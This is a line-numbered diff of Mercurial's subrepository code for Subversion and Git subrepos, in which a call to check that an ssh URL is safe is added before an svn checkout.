1039 self.wvfs.reljoin(prefix, self._path),
1040 after, force, subrepos)
1040 after, force, subrepos)
1041
1041
1042 @annotatesubrepoerror
1042 @annotatesubrepoerror
1043 def revert(self, substate, *pats, **opts):
1043 def revert(self, substate, *pats, **opts):
1044 # reverting a subrepo is a 2 step process:
1044 # reverting a subrepo is a 2 step process:
1045 # 1. if the no_backup is not set, revert all modified
1045 # 1. if the no_backup is not set, revert all modified
1046 # files inside the subrepo
1046 # files inside the subrepo
1047 # 2. update the subrepo to the revision specified in
1047 # 2. update the subrepo to the revision specified in
1048 # the corresponding substate dictionary
1048 # the corresponding substate dictionary
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1050 if not opts.get('no_backup'):
1050 if not opts.get('no_backup'):
1051 # Revert all files on the subrepo, creating backups
1051 # Revert all files on the subrepo, creating backups
1052 # Note that this will not recursively revert subrepos
1052 # Note that this will not recursively revert subrepos
1053 # We could do it if there was a set:subrepos() predicate
1053 # We could do it if there was a set:subrepos() predicate
1054 opts = opts.copy()
1054 opts = opts.copy()
1055 opts['date'] = None
1055 opts['date'] = None
1056 opts['rev'] = substate[1]
1056 opts['rev'] = substate[1]
1057
1057
1058 self.filerevert(*pats, **opts)
1058 self.filerevert(*pats, **opts)
1059
1059
1060 # Update the repo to the revision specified in the given substate
1060 # Update the repo to the revision specified in the given substate
1061 if not opts.get('dry_run'):
1061 if not opts.get('dry_run'):
1062 self.get(substate, overwrite=True)
1062 self.get(substate, overwrite=True)
1063
1063
1064 def filerevert(self, *pats, **opts):
1064 def filerevert(self, *pats, **opts):
1065 ctx = self._repo[opts['rev']]
1065 ctx = self._repo[opts['rev']]
1066 parents = self._repo.dirstate.parents()
1066 parents = self._repo.dirstate.parents()
1067 if opts.get('all'):
1067 if opts.get('all'):
1068 pats = ['set:modified()']
1068 pats = ['set:modified()']
1069 else:
1069 else:
1070 pats = []
1070 pats = []
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1072
1072
1073 def shortid(self, revid):
1073 def shortid(self, revid):
1074 return revid[:12]
1074 return revid[:12]
1075
1075
1076 def verify(self):
1076 def verify(self):
1077 try:
1077 try:
1078 rev = self._state[1]
1078 rev = self._state[1]
1079 ctx = self._repo.unfiltered()[rev]
1079 ctx = self._repo.unfiltered()[rev]
1080 if ctx.hidden():
1080 if ctx.hidden():
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1082 # explicit warning.
1082 # explicit warning.
1083 ui = self._repo.ui
1083 ui = self._repo.ui
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1085 (self._relpath, node.short(self._ctx.node())))
1085 (self._relpath, node.short(self._ctx.node())))
1086 return 0
1086 return 0
1087 except error.RepoLookupError:
1087 except error.RepoLookupError:
1088 # A missing subrepo revision may be a case of needing to pull it, so
1088 # A missing subrepo revision may be a case of needing to pull it, so
1089 # don't treat this as an error.
1089 # don't treat this as an error.
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1091 (self._relpath, node.short(self._ctx.node())))
1091 (self._relpath, node.short(self._ctx.node())))
1092 return 0
1092 return 0
1093
1093
1094 @propertycache
1094 @propertycache
1095 def wvfs(self):
1095 def wvfs(self):
1096 """return own wvfs for efficiency and consistency
1096 """return own wvfs for efficiency and consistency
1097 """
1097 """
1098 return self._repo.wvfs
1098 return self._repo.wvfs
1099
1099
1100 @propertycache
1100 @propertycache
1101 def _relpath(self):
1101 def _relpath(self):
1102 """return path to this subrepository as seen from outermost repository
1102 """return path to this subrepository as seen from outermost repository
1103 """
1103 """
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1105 return reporelpath(self._repo)
1105 return reporelpath(self._repo)
1106
1106
1107 class svnsubrepo(abstractsubrepo):
1107 class svnsubrepo(abstractsubrepo):
1108 def __init__(self, ctx, path, state, allowcreate):
1108 def __init__(self, ctx, path, state, allowcreate):
1109 super(svnsubrepo, self).__init__(ctx, path)
1109 super(svnsubrepo, self).__init__(ctx, path)
1110 self._state = state
1110 self._state = state
1111 self._exe = util.findexe('svn')
1111 self._exe = util.findexe('svn')
1112 if not self._exe:
1112 if not self._exe:
1113 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1113 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1114 % self._path)
1114 % self._path)
1115
1115
1116 def _svncommand(self, commands, filename='', failok=False):
1116 def _svncommand(self, commands, filename='', failok=False):
1117 cmd = [self._exe]
1117 cmd = [self._exe]
1118 extrakw = {}
1118 extrakw = {}
1119 if not self.ui.interactive():
1119 if not self.ui.interactive():
1120 # Making stdin be a pipe should prevent svn from behaving
1120 # Making stdin be a pipe should prevent svn from behaving
1121 # interactively even if we can't pass --non-interactive.
1121 # interactively even if we can't pass --non-interactive.
1122 extrakw['stdin'] = subprocess.PIPE
1122 extrakw['stdin'] = subprocess.PIPE
1123 # Starting in svn 1.5 --non-interactive is a global flag
1123 # Starting in svn 1.5 --non-interactive is a global flag
1124 # instead of being per-command, but we need to support 1.4 so
1124 # instead of being per-command, but we need to support 1.4 so
1125 # we have to be intelligent about what commands take
1125 # we have to be intelligent about what commands take
1126 # --non-interactive.
1126 # --non-interactive.
1127 if commands[0] in ('update', 'checkout', 'commit'):
1127 if commands[0] in ('update', 'checkout', 'commit'):
1128 cmd.append('--non-interactive')
1128 cmd.append('--non-interactive')
1129 cmd.extend(commands)
1129 cmd.extend(commands)
1130 if filename is not None:
1130 if filename is not None:
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1132 self._path, filename)
1132 self._path, filename)
1133 cmd.append(path)
1133 cmd.append(path)
1134 env = dict(encoding.environ)
1134 env = dict(encoding.environ)
1135 # Avoid localized output, preserve current locale for everything else.
1135 # Avoid localized output, preserve current locale for everything else.
1136 lc_all = env.get('LC_ALL')
1136 lc_all = env.get('LC_ALL')
1137 if lc_all:
1137 if lc_all:
1138 env['LANG'] = lc_all
1138 env['LANG'] = lc_all
1139 del env['LC_ALL']
1139 del env['LC_ALL']
1140 env['LC_MESSAGES'] = 'C'
1140 env['LC_MESSAGES'] = 'C'
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1143 universal_newlines=True, env=env, **extrakw)
1143 universal_newlines=True, env=env, **extrakw)
1144 stdout, stderr = p.communicate()
1144 stdout, stderr = p.communicate()
1145 stderr = stderr.strip()
1145 stderr = stderr.strip()
1146 if not failok:
1146 if not failok:
1147 if p.returncode:
1147 if p.returncode:
1148 raise error.Abort(stderr or 'exited with code %d'
1148 raise error.Abort(stderr or 'exited with code %d'
1149 % p.returncode)
1149 % p.returncode)
1150 if stderr:
1150 if stderr:
1151 self.ui.warn(stderr + '\n')
1151 self.ui.warn(stderr + '\n')
1152 return stdout, stderr
1152 return stdout, stderr
1153
1153
1154 @propertycache
1154 @propertycache
1155 def _svnversion(self):
1155 def _svnversion(self):
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1158 if not m:
1158 if not m:
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1160 return (int(m.group(1)), int(m.group(2)))
1160 return (int(m.group(1)), int(m.group(2)))
1161
1161
1162 def _wcrevs(self):
1162 def _wcrevs(self):
1163 # Get the working directory revision as well as the last
1163 # Get the working directory revision as well as the last
1164 # commit revision so we can compare the subrepo state with
1164 # commit revision so we can compare the subrepo state with
1165 # both. We used to store the working directory one.
1165 # both. We used to store the working directory one.
1166 output, err = self._svncommand(['info', '--xml'])
1166 output, err = self._svncommand(['info', '--xml'])
1167 doc = xml.dom.minidom.parseString(output)
1167 doc = xml.dom.minidom.parseString(output)
1168 entries = doc.getElementsByTagName('entry')
1168 entries = doc.getElementsByTagName('entry')
1169 lastrev, rev = '0', '0'
1169 lastrev, rev = '0', '0'
1170 if entries:
1170 if entries:
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1172 commits = entries[0].getElementsByTagName('commit')
1172 commits = entries[0].getElementsByTagName('commit')
1173 if commits:
1173 if commits:
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1175 return (lastrev, rev)
1175 return (lastrev, rev)
1176
1176
1177 def _wcrev(self):
1177 def _wcrev(self):
1178 return self._wcrevs()[0]
1178 return self._wcrevs()[0]
1179
1179
1180 def _wcchanged(self):
1180 def _wcchanged(self):
1181 """Return (changes, extchanges, missing) where changes is True
1181 """Return (changes, extchanges, missing) where changes is True
1182 if the working directory was changed, extchanges is
1182 if the working directory was changed, extchanges is
1183 True if any of these changes concern an external entry and missing
1183 True if any of these changes concern an external entry and missing
1184 is True if any change is a missing entry.
1184 is True if any change is a missing entry.
1185 """
1185 """
1186 output, err = self._svncommand(['status', '--xml'])
1186 output, err = self._svncommand(['status', '--xml'])
1187 externals, changes, missing = [], [], []
1187 externals, changes, missing = [], [], []
1188 doc = xml.dom.minidom.parseString(output)
1188 doc = xml.dom.minidom.parseString(output)
1189 for e in doc.getElementsByTagName('entry'):
1189 for e in doc.getElementsByTagName('entry'):
1190 s = e.getElementsByTagName('wc-status')
1190 s = e.getElementsByTagName('wc-status')
1191 if not s:
1191 if not s:
1192 continue
1192 continue
1193 item = s[0].getAttribute('item')
1193 item = s[0].getAttribute('item')
1194 props = s[0].getAttribute('props')
1194 props = s[0].getAttribute('props')
1195 path = e.getAttribute('path')
1195 path = e.getAttribute('path')
1196 if item == 'external':
1196 if item == 'external':
1197 externals.append(path)
1197 externals.append(path)
1198 elif item == 'missing':
1198 elif item == 'missing':
1199 missing.append(path)
1199 missing.append(path)
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1201 or props not in ('', 'none', 'normal')):
1201 or props not in ('', 'none', 'normal')):
1202 changes.append(path)
1202 changes.append(path)
1203 for path in changes:
1203 for path in changes:
1204 for ext in externals:
1204 for ext in externals:
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1206 return True, True, bool(missing)
1206 return True, True, bool(missing)
1207 return bool(changes), False, bool(missing)
1207 return bool(changes), False, bool(missing)
1208
1208
1209 def dirty(self, ignoreupdate=False, missing=False):
1209 def dirty(self, ignoreupdate=False, missing=False):
1210 wcchanged = self._wcchanged()
1210 wcchanged = self._wcchanged()
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1212 if not changed:
1212 if not changed:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1214 return False
1214 return False
1215 return True
1215 return True
1216
1216
1217 def basestate(self):
1217 def basestate(self):
1218 lastrev, rev = self._wcrevs()
1218 lastrev, rev = self._wcrevs()
1219 if lastrev != rev:
1219 if lastrev != rev:
1220 # Last committed rev is not the same than rev. We would
1220 # Last committed rev is not the same than rev. We would
1221 # like to take lastrev but we do not know if the subrepo
1221 # like to take lastrev but we do not know if the subrepo
1222 # URL exists at lastrev. Test it and fallback to rev it
1222 # URL exists at lastrev. Test it and fallback to rev it
1223 # is not there.
1223 # is not there.
1224 try:
1224 try:
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1226 return lastrev
1226 return lastrev
1227 except error.Abort:
1227 except error.Abort:
1228 pass
1228 pass
1229 return rev
1229 return rev
1230
1230
1231 @annotatesubrepoerror
1231 @annotatesubrepoerror
1232 def commit(self, text, user, date):
1232 def commit(self, text, user, date):
1233 # user and date are out of our hands since svn is centralized
1233 # user and date are out of our hands since svn is centralized
1234 changed, extchanged, missing = self._wcchanged()
1234 changed, extchanged, missing = self._wcchanged()
1235 if not changed:
1235 if not changed:
1236 return self.basestate()
1236 return self.basestate()
1237 if extchanged:
1237 if extchanged:
1238 # Do not try to commit externals
1238 # Do not try to commit externals
1239 raise error.Abort(_('cannot commit svn externals'))
1239 raise error.Abort(_('cannot commit svn externals'))
1240 if missing:
1240 if missing:
1241 # svn can commit with missing entries but aborting like hg
1241 # svn can commit with missing entries but aborting like hg
1242 # seems a better approach.
1242 # seems a better approach.
1243 raise error.Abort(_('cannot commit missing svn entries'))
1243 raise error.Abort(_('cannot commit missing svn entries'))
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1245 self.ui.status(commitinfo)
1245 self.ui.status(commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1247 if not newrev:
1247 if not newrev:
1248 if not commitinfo.strip():
1248 if not commitinfo.strip():
1249 # Sometimes, our definition of "changed" differs from
1249 # Sometimes, our definition of "changed" differs from
1250 # svn one. For instance, svn ignores missing files
1250 # svn one. For instance, svn ignores missing files
1251 # when committing. If there are only missing files, no
1251 # when committing. If there are only missing files, no
1252 # commit is made, no output and no error code.
1252 # commit is made, no output and no error code.
1253 raise error.Abort(_('failed to commit svn changes'))
1253 raise error.Abort(_('failed to commit svn changes'))
1254 raise error.Abort(commitinfo.splitlines()[-1])
1254 raise error.Abort(commitinfo.splitlines()[-1])
1255 newrev = newrev.groups()[0]
1255 newrev = newrev.groups()[0]
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1257 return newrev
1257 return newrev
1258
1258
1259 @annotatesubrepoerror
1259 @annotatesubrepoerror
1260 def remove(self):
1260 def remove(self):
1261 if self.dirty():
1261 if self.dirty():
1262 self.ui.warn(_('not removing repo %s because '
1262 self.ui.warn(_('not removing repo %s because '
1263 'it has changes.\n') % self._path)
1263 'it has changes.\n') % self._path)
1264 return
1264 return
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1266
1266
1267 self.wvfs.rmtree(forcibly=True)
1267 self.wvfs.rmtree(forcibly=True)
1268 try:
1268 try:
1269 pwvfs = self._ctx.repo().wvfs
1269 pwvfs = self._ctx.repo().wvfs
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1271 except OSError:
1271 except OSError:
1272 pass
1272 pass
1273
1273
1274 @annotatesubrepoerror
1274 @annotatesubrepoerror
1275 def get(self, state, overwrite=False):
1275 def get(self, state, overwrite=False):
1276 if overwrite:
1276 if overwrite:
1277 self._svncommand(['revert', '--recursive'])
1277 self._svncommand(['revert', '--recursive'])
1278 args = ['checkout']
1278 args = ['checkout']
1279 if self._svnversion >= (1, 5):
1279 if self._svnversion >= (1, 5):
1280 args.append('--force')
1280 args.append('--force')
1281 # The revision must be specified at the end of the URL to properly
1281 # The revision must be specified at the end of the URL to properly
1282 # update to a directory which has since been deleted and recreated.
1282 # update to a directory which has since been deleted and recreated.
1283 args.append('%s@%s' % (state[0], state[1]))
1283 args.append('%s@%s' % (state[0], state[1]))
1284
1285 # SEC: check that the ssh url is safe
1286 util.checksafessh(state[0])
1287
1284 status, err = self._svncommand(args, failok=True)
1288 status, err = self._svncommand(args, failok=True)
1285 _sanitize(self.ui, self.wvfs, '.svn')
1289 _sanitize(self.ui, self.wvfs, '.svn')
1286 if not re.search('Checked out revision [0-9]+.', status):
1290 if not re.search('Checked out revision [0-9]+.', status):
1287 if ('is already a working copy for a different URL' in err
1291 if ('is already a working copy for a different URL' in err
1288 and (self._wcchanged()[:2] == (False, False))):
1292 and (self._wcchanged()[:2] == (False, False))):
1289 # obstructed but clean working copy, so just blow it away.
1293 # obstructed but clean working copy, so just blow it away.
1290 self.remove()
1294 self.remove()
1291 self.get(state, overwrite=False)
1295 self.get(state, overwrite=False)
1292 return
1296 return
1293 raise error.Abort((status or err).splitlines()[-1])
1297 raise error.Abort((status or err).splitlines()[-1])
1294 self.ui.status(status)
1298 self.ui.status(status)
1295
1299
1296 @annotatesubrepoerror
1300 @annotatesubrepoerror
1297 def merge(self, state):
1301 def merge(self, state):
1298 old = self._state[1]
1302 old = self._state[1]
1299 new = state[1]
1303 new = state[1]
1300 wcrev = self._wcrev()
1304 wcrev = self._wcrev()
1301 if new != wcrev:
1305 if new != wcrev:
1302 dirty = old == wcrev or self._wcchanged()[0]
1306 dirty = old == wcrev or self._wcchanged()[0]
1303 if _updateprompt(self.ui, self, dirty, wcrev, new):
1307 if _updateprompt(self.ui, self, dirty, wcrev, new):
1304 self.get(state, False)
1308 self.get(state, False)
1305
1309
1306 def push(self, opts):
1310 def push(self, opts):
1307 # push is a no-op for SVN
1311 # push is a no-op for SVN
1308 return True
1312 return True
1309
1313
1310 @annotatesubrepoerror
1314 @annotatesubrepoerror
1311 def files(self):
1315 def files(self):
1312 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1316 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1313 doc = xml.dom.minidom.parseString(output)
1317 doc = xml.dom.minidom.parseString(output)
1314 paths = []
1318 paths = []
1315 for e in doc.getElementsByTagName('entry'):
1319 for e in doc.getElementsByTagName('entry'):
1316 kind = str(e.getAttribute('kind'))
1320 kind = str(e.getAttribute('kind'))
1317 if kind != 'file':
1321 if kind != 'file':
1318 continue
1322 continue
1319 name = ''.join(c.data for c
1323 name = ''.join(c.data for c
1320 in e.getElementsByTagName('name')[0].childNodes
1324 in e.getElementsByTagName('name')[0].childNodes
1321 if c.nodeType == c.TEXT_NODE)
1325 if c.nodeType == c.TEXT_NODE)
1322 paths.append(name.encode('utf-8'))
1326 paths.append(name.encode('utf-8'))
1323 return paths
1327 return paths
1324
1328
1325 def filedata(self, name, decode):
1329 def filedata(self, name, decode):
1326 return self._svncommand(['cat'], name)[0]
1330 return self._svncommand(['cat'], name)[0]
1327
1331
1328
1332
1329 class gitsubrepo(abstractsubrepo):
1333 class gitsubrepo(abstractsubrepo):
1330 def __init__(self, ctx, path, state, allowcreate):
1334 def __init__(self, ctx, path, state, allowcreate):
1331 super(gitsubrepo, self).__init__(ctx, path)
1335 super(gitsubrepo, self).__init__(ctx, path)
1332 self._state = state
1336 self._state = state
1333 self._abspath = ctx.repo().wjoin(path)
1337 self._abspath = ctx.repo().wjoin(path)
1334 self._subparent = ctx.repo()
1338 self._subparent = ctx.repo()
1335 self._ensuregit()
1339 self._ensuregit()
1336
1340
1337 def _ensuregit(self):
1341 def _ensuregit(self):
1338 try:
1342 try:
1339 self._gitexecutable = 'git'
1343 self._gitexecutable = 'git'
1340 out, err = self._gitnodir(['--version'])
1344 out, err = self._gitnodir(['--version'])
1341 except OSError as e:
1345 except OSError as e:
1342 genericerror = _("error executing git for subrepo '%s': %s")
1346 genericerror = _("error executing git for subrepo '%s': %s")
1343 notfoundhint = _("check git is installed and in your PATH")
1347 notfoundhint = _("check git is installed and in your PATH")
1344 if e.errno != errno.ENOENT:
1348 if e.errno != errno.ENOENT:
1345 raise error.Abort(genericerror % (self._path, e.strerror))
1349 raise error.Abort(genericerror % (self._path, e.strerror))
1346 elif pycompat.osname == 'nt':
1350 elif pycompat.osname == 'nt':
1347 try:
1351 try:
1348 self._gitexecutable = 'git.cmd'
1352 self._gitexecutable = 'git.cmd'
1349 out, err = self._gitnodir(['--version'])
1353 out, err = self._gitnodir(['--version'])
1350 except OSError as e2:
1354 except OSError as e2:
1351 if e2.errno == errno.ENOENT:
1355 if e2.errno == errno.ENOENT:
1352 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1356 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1353 " for subrepo '%s'") % self._path,
1357 " for subrepo '%s'") % self._path,
1354 hint=notfoundhint)
1358 hint=notfoundhint)
1355 else:
1359 else:
1356 raise error.Abort(genericerror % (self._path,
1360 raise error.Abort(genericerror % (self._path,
1357 e2.strerror))
1361 e2.strerror))
1358 else:
1362 else:
1359 raise error.Abort(_("couldn't find git for subrepo '%s'")
1363 raise error.Abort(_("couldn't find git for subrepo '%s'")
1360 % self._path, hint=notfoundhint)
1364 % self._path, hint=notfoundhint)
1361 versionstatus = self._checkversion(out)
1365 versionstatus = self._checkversion(out)
1362 if versionstatus == 'unknown':
1366 if versionstatus == 'unknown':
1363 self.ui.warn(_('cannot retrieve git version\n'))
1367 self.ui.warn(_('cannot retrieve git version\n'))
1364 elif versionstatus == 'abort':
1368 elif versionstatus == 'abort':
1365 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1369 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1366 elif versionstatus == 'warning':
1370 elif versionstatus == 'warning':
1367 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1371 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1368
1372
1369 @staticmethod
1373 @staticmethod
1370 def _gitversion(out):
1374 def _gitversion(out):
1371 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1375 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1372 if m:
1376 if m:
1373 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1377 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1374
1378
1375 m = re.search(r'^git version (\d+)\.(\d+)', out)
1379 m = re.search(r'^git version (\d+)\.(\d+)', out)
1376 if m:
1380 if m:
1377 return (int(m.group(1)), int(m.group(2)), 0)
1381 return (int(m.group(1)), int(m.group(2)), 0)
1378
1382
1379 return -1
1383 return -1
1380
1384
1381 @staticmethod
1385 @staticmethod
1382 def _checkversion(out):
1386 def _checkversion(out):
1383 '''ensure git version is new enough
1387 '''ensure git version is new enough
1384
1388
1385 >>> _checkversion = gitsubrepo._checkversion
1389 >>> _checkversion = gitsubrepo._checkversion
1386 >>> _checkversion('git version 1.6.0')
1390 >>> _checkversion('git version 1.6.0')
1387 'ok'
1391 'ok'
1388 >>> _checkversion('git version 1.8.5')
1392 >>> _checkversion('git version 1.8.5')
1389 'ok'
1393 'ok'
1390 >>> _checkversion('git version 1.4.0')
1394 >>> _checkversion('git version 1.4.0')
1391 'abort'
1395 'abort'
1392 >>> _checkversion('git version 1.5.0')
1396 >>> _checkversion('git version 1.5.0')
1393 'warning'
1397 'warning'
1394 >>> _checkversion('git version 1.9-rc0')
1398 >>> _checkversion('git version 1.9-rc0')
1395 'ok'
1399 'ok'
1396 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1400 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1397 'ok'
1401 'ok'
1398 >>> _checkversion('git version 1.9.0.GIT')
1402 >>> _checkversion('git version 1.9.0.GIT')
1399 'ok'
1403 'ok'
1400 >>> _checkversion('git version 12345')
1404 >>> _checkversion('git version 12345')
1401 'unknown'
1405 'unknown'
1402 >>> _checkversion('no')
1406 >>> _checkversion('no')
1403 'unknown'
1407 'unknown'
1404 '''
1408 '''
1405 version = gitsubrepo._gitversion(out)
1409 version = gitsubrepo._gitversion(out)
1406 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1410 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1407 # despite the docstring comment. For now, error on 1.4.0, warn on
1411 # despite the docstring comment. For now, error on 1.4.0, warn on
1408 # 1.5.0 but attempt to continue.
1412 # 1.5.0 but attempt to continue.
1409 if version == -1:
1413 if version == -1:
1410 return 'unknown'
1414 return 'unknown'
1411 if version < (1, 5, 0):
1415 if version < (1, 5, 0):
1412 return 'abort'
1416 return 'abort'
1413 elif version < (1, 6, 0):
1417 elif version < (1, 6, 0):
1414 return 'warning'
1418 return 'warning'
1415 return 'ok'
1419 return 'ok'
1416
1420
1417 def _gitcommand(self, commands, env=None, stream=False):
1421 def _gitcommand(self, commands, env=None, stream=False):
1418 return self._gitdir(commands, env=env, stream=stream)[0]
1422 return self._gitdir(commands, env=env, stream=stream)[0]
1419
1423
1420 def _gitdir(self, commands, env=None, stream=False):
1424 def _gitdir(self, commands, env=None, stream=False):
1421 return self._gitnodir(commands, env=env, stream=stream,
1425 return self._gitnodir(commands, env=env, stream=stream,
1422 cwd=self._abspath)
1426 cwd=self._abspath)
1423
1427
1424 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1428 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1425 """Calls the git command
1429 """Calls the git command
1426
1430
1427 The methods tries to call the git command. versions prior to 1.6.0
1431 The methods tries to call the git command. versions prior to 1.6.0
1428 are not supported and very probably fail.
1432 are not supported and very probably fail.
1429 """
1433 """
1430 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1434 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1431 if env is None:
1435 if env is None:
1432 env = encoding.environ.copy()
1436 env = encoding.environ.copy()
1433 # disable localization for Git output (issue5176)
1437 # disable localization for Git output (issue5176)
1434 env['LC_ALL'] = 'C'
1438 env['LC_ALL'] = 'C'
1435 # fix for Git CVE-2015-7545
1439 # fix for Git CVE-2015-7545
1436 if 'GIT_ALLOW_PROTOCOL' not in env:
1440 if 'GIT_ALLOW_PROTOCOL' not in env:
1437 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1441 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1438 # unless ui.quiet is set, print git's stderr,
1442 # unless ui.quiet is set, print git's stderr,
1439 # which is mostly progress and useful info
1443 # which is mostly progress and useful info
1440 errpipe = None
1444 errpipe = None
1441 if self.ui.quiet:
1445 if self.ui.quiet:
1442 errpipe = open(os.devnull, 'w')
1446 errpipe = open(os.devnull, 'w')
1443 if self.ui._colormode and len(commands) and commands[0] == "diff":
1447 if self.ui._colormode and len(commands) and commands[0] == "diff":
1444 # insert the argument in the front,
1448 # insert the argument in the front,
1445 # the end of git diff arguments is used for paths
1449 # the end of git diff arguments is used for paths
1446 commands.insert(1, '--color')
1450 commands.insert(1, '--color')
1447 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1451 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1448 cwd=cwd, env=env, close_fds=util.closefds,
1452 cwd=cwd, env=env, close_fds=util.closefds,
1449 stdout=subprocess.PIPE, stderr=errpipe)
1453 stdout=subprocess.PIPE, stderr=errpipe)
1450 if stream:
1454 if stream:
1451 return p.stdout, None
1455 return p.stdout, None
1452
1456
1453 retdata = p.stdout.read().strip()
1457 retdata = p.stdout.read().strip()
1454 # wait for the child to exit to avoid race condition.
1458 # wait for the child to exit to avoid race condition.
1455 p.wait()
1459 p.wait()
1456
1460
1457 if p.returncode != 0 and p.returncode != 1:
1461 if p.returncode != 0 and p.returncode != 1:
1458 # there are certain error codes that are ok
1462 # there are certain error codes that are ok
1459 command = commands[0]
1463 command = commands[0]
1460 if command in ('cat-file', 'symbolic-ref'):
1464 if command in ('cat-file', 'symbolic-ref'):
1461 return retdata, p.returncode
1465 return retdata, p.returncode
1462 # for all others, abort
1466 # for all others, abort
1463 raise error.Abort(_('git %s error %d in %s') %
1467 raise error.Abort(_('git %s error %d in %s') %
1464 (command, p.returncode, self._relpath))
1468 (command, p.returncode, self._relpath))
1465
1469
1466 return retdata, p.returncode
1470 return retdata, p.returncode
1467
1471
1468 def _gitmissing(self):
1472 def _gitmissing(self):
1469 return not self.wvfs.exists('.git')
1473 return not self.wvfs.exists('.git')
1470
1474
1471 def _gitstate(self):
1475 def _gitstate(self):
1472 return self._gitcommand(['rev-parse', 'HEAD'])
1476 return self._gitcommand(['rev-parse', 'HEAD'])
1473
1477
1474 def _gitcurrentbranch(self):
1478 def _gitcurrentbranch(self):
1475 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1479 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1476 if err:
1480 if err:
1477 current = None
1481 current = None
1478 return current
1482 return current
1479
1483
1480 def _gitremote(self, remote):
1484 def _gitremote(self, remote):
1481 out = self._gitcommand(['remote', 'show', '-n', remote])
1485 out = self._gitcommand(['remote', 'show', '-n', remote])
1482 line = out.split('\n')[1]
1486 line = out.split('\n')[1]
1483 i = line.index('URL: ') + len('URL: ')
1487 i = line.index('URL: ') + len('URL: ')
1484 return line[i:]
1488 return line[i:]
1485
1489
1486 def _githavelocally(self, revision):
1490 def _githavelocally(self, revision):
1487 out, code = self._gitdir(['cat-file', '-e', revision])
1491 out, code = self._gitdir(['cat-file', '-e', revision])
1488 return code == 0
1492 return code == 0
1489
1493
1490 def _gitisancestor(self, r1, r2):
1494 def _gitisancestor(self, r1, r2):
1491 base = self._gitcommand(['merge-base', r1, r2])
1495 base = self._gitcommand(['merge-base', r1, r2])
1492 return base == r1
1496 return base == r1
1493
1497
1494 def _gitisbare(self):
1498 def _gitisbare(self):
1495 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1499 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1496
1500
